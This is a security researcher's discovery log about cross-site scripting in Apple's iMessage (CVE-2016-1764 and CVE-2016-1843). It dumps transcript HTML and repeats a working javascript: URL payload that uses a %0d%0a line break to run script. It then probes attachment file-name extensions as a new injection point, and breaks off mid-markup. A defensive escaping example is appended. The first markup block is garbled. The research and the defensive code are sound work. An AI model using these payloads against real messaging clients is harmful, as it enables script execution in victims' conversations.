From an Old Vulnerability to a New One: iMessage 0day (CVE-2016-1843) Discovery Log

```html
prompt(1,document.head.innerHTML)">javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)compact">s:AE1ABCF1-2397-4F20-A71F-D71FFE8042F5" contiguous="no" role="heading" aria-level="1" item-type="status" receipt-fade="in">YES" id="receipt-delivered-s:ae1abcf1-2397-4f20-a71f-d71ffe8042f5">receipt-container">receipt-item">已送达p:0/43545678-5DB7-4B35-8B81-xxxxxxxxxxxx" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="text" group-first-message-ignore-timestamps="yes" group-last-message-ignore-timestamps="yes">p:0/43545678-5DB7-4B35-8B81-xxxxxxxxxxxx" typing-indicator="no" sent="no" from-me="no" from-system="no" from="D8FAE154-6C88-4FB6-9D2D-0C234BEA8E99" emote="no" played="no" auto-reply="no" group-first-message="yes" group-last-message="yes">img" aria-label="黑哥">今天 23:24:51" aria-label="javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)">
prompt(1,document.head.innerHTML)">javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)compact">/date>/message>spacer>/spacer>/chatitem>
```
So the key trigger point is this:

```html
<a href="javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)" title="javascript://a/research?
prompt(1,document.head.innerHTML)">javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)</a>
```

The javascript: URL is placed directly into the href of the a tag, so clicking the link executes it. The fix in the new version is simply to stop parsing javascript:// URLs at all.
0x03 From the Old Vulnerability (CVE-2016-1764) to a 0day
The essence of an XSS vulnerability is that the code you inject ends up being parsed and executed. Since we have already seen document.head.innerHTML pop up, are there other chances to inject code? The first thing I tested was of course that same point, trying to break out with " and <, but unfortunately both were filtered. If that point is out, we can look at the other places that accept input, so I tried sending an attachment to see how it gets rendered. Part of the markup is below:
```html
<chatitem id="p:0/FE98E898-0385-41E6-933F-8E87DB10AA7E" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="attachment" group-first-message-ignore-timestamps="yes" group-last-message-ignore-timestamps="yes">
<message guid="p:0/FE98E898-0385-41E6-933F-8E87DB10AA7E" typing-indicator="no" sent="no" from-me="no" from-system="no" from="D8FAE154-6C88-4FB6-9D2D-0C234BEA8E99" emote="no" played="no" auto-reply="no" group-first-message="yes" group-last-message="yes">
<buddyicon role="img" aria-label="黑哥"><div></div></buddyicon>
<messagetext>
<messagebody title="今天 23:34:41" file-transfer-element="yes" aria-label="文件传输: tttt.html">
<messagetextcontainer text-direction="ltr">
<transfer class="transfer" id="45B8E6BD-9826-47E2-B910-D584CE461E5F" guid="45B8E6BD-9826-47E2-B910-D584CE461E5F">
<transfer-atom draggable="true" aria-label="tttt.html" id="45B8E6BD-9826-47E2-B910-D584CE461E5F" guid="45B8E6BD-9826-47E2-B910-D584CE461E5F">
<img class="transfer-icon" extension="html" aria-label="文件扩展名: html" style="content: -webkit-image-set(url(transcript-resource://iconpreview/html/16) 1x, url(transcript-resource://iconpreview/html-2x/16) 2x);">
<span class="transfer-text" color-important="no">tttt</span>
</transfer-atom>
<div class="transfer-button-container">
<img class="transfer-button-reveal" aria-label="显示" id="filetransfer-button-45B8E6BD-9826-47E2-B910-D584CE461E5F" role="button">
</div>
</transfer>
</messagetextcontainer>
</messagebody>
<message-overlay></message-overlay>
</messagetext>
<date class="compact"></date>
</message>
<spacer></spacer>
</chatitem>
```
I sent an attachment named tttt.html, and its file name shows up in the markup, so there may be a chance to control it. After many tests I found the filtering here is also quite strict, but in the end I did find one potential point: the extension part of the file name:
```html
<chatitem id="p:0/D4591950-20AD-44F8-80A1-E65911DCBA22" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="attachment" group-first-message-ignore-timestamps="yes" group-last-message-ignore-timestamps="yes">
<message guid="p:0/D4591950-20AD-44F8-80A1-E65911DCBA22" typing-indicator="no" sent="no" from-me="no" from-system="no" from="93D2D530-0E94-4CEB-A41E-2F21DE32715D" emote="no" played="no"
```
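As an added defensive example (not code from the original post, nor Apple's), here is how a transcript renderer could handle the two injection points discussed above, the link href and the attachment file name with its extension attribute. The helper names safeHref, renderLink and renderAttachment are assumptions for illustration; scheme normalisation relies on the standard WHATWG URL parser available in browsers and Node.

```javascript
// Added example, not part of the original post. Defensive rendering for the
// two sinks the post identifies: a clickable link and an attachment name.

// Only these schemes may ever become a clickable href.
const SAFE_SCHEMES = new Set(["http:", "https:", "mailto:"]);

// Escape everything that could terminate an attribute or open a tag.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Parse with the URL constructor so the scheme is normalised (lower-cased,
// embedded tab/newline removed) before the allow-list check. The post's
// javascript://a/research?%0d%0aprompt(...) link is rejected because its
// scheme is javascript:, whatever follows the scheme.
function safeHref(raw) {
  let url;
  try { url = new URL(raw); } catch { return null; }
  return SAFE_SCHEMES.has(url.protocol) ? url.href : null;
}

// An unsafe URL is shown as plain text, never as an anchor.
function renderLink(raw) {
  const text = escapeHtml(raw);
  const href = safeHref(raw);
  return href ? `<a href="${escapeHtml(href)}">${text}</a>` : `<span>${text}</span>`;
}

// The extension lands in an attribute (extension="html" in the post's markup),
// so derive it through a strict character class instead of trusting the name;
// the visible name is escaped before it is placed in an attribute or text.
function renderAttachment(fileName) {
  const m = /\.([A-Za-z0-9]{1,10})$/.exec(fileName);
  const ext = m ? m[1].toLowerCase() : "";
  const safeName = escapeHtml(fileName);
  return `<transfer-atom aria-label="${safeName}">` +
         `<img class="transfer-icon" extension="${ext}">` +
         `<span class="transfer-text">${safeName}</span></transfer-atom>`;
}
```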
